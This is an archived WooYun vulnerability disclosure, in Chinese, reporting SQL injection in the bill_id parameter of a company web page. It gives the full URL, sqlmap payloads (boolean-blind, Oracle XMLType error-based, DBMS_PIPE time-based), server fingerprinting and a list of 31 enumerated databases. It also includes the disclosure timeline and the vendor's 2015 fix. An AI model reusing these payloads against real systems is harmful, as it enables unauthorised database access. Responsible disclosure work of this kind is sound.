乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-11: 细节已通知厂商并且等待厂商处理中 2015-09-11: 厂商已经确认,细节仅向厂商公开 2015-09-21: 细节向核心白帽子及相关领域专家公开 2015-10-01: 细节向普通白帽子公开 2015-10-11: 细节向实习白帽子公开 2015-10-19: 厂商已经修复漏洞并主动公开,细节向公众公开
sql注入
http://ds34.digitalchina.com/HPISS/fix/sdar.aspx?bill_id=4751594513-471
Parameter: bill_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: bill_id=4751594513-471%' AND 9047=9047 AND '%'=' Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: bill_id=4751594513-471%' AND 5293=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(107)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (5293=5293) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(113)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND '%'=' Type: AND/OR time-based blind Title: Oracle OR time-based blind Payload: bill_id=4751594513-471%' OR 2210=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(75)||CHR(103)||CHR(101),5) AND '%'='---[11:23:11] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Oracle
涉及31个库
available databases [31]:[*] A_APPLE[*] A_BOOKING[*] A_CINEMA[*] A_HEDY[*] A_ISS[*] A_NECD[*] A_QQ[*] A_SALES[*] A_SURFACE[*] A_UBO[*] APEX_030200[*] APPQOSSYS[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] MDSYS[*] NEC[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] SCOTT[*] SHARP[*] SYS[*] SYSMAN[*] SYSTEM[*] WMSYS[*] WXGL[*] XDB
过滤
危害等级:中
漏洞Rank:10
确认时间:2015-09-11 14:00
谢谢
2015-10-19:已修复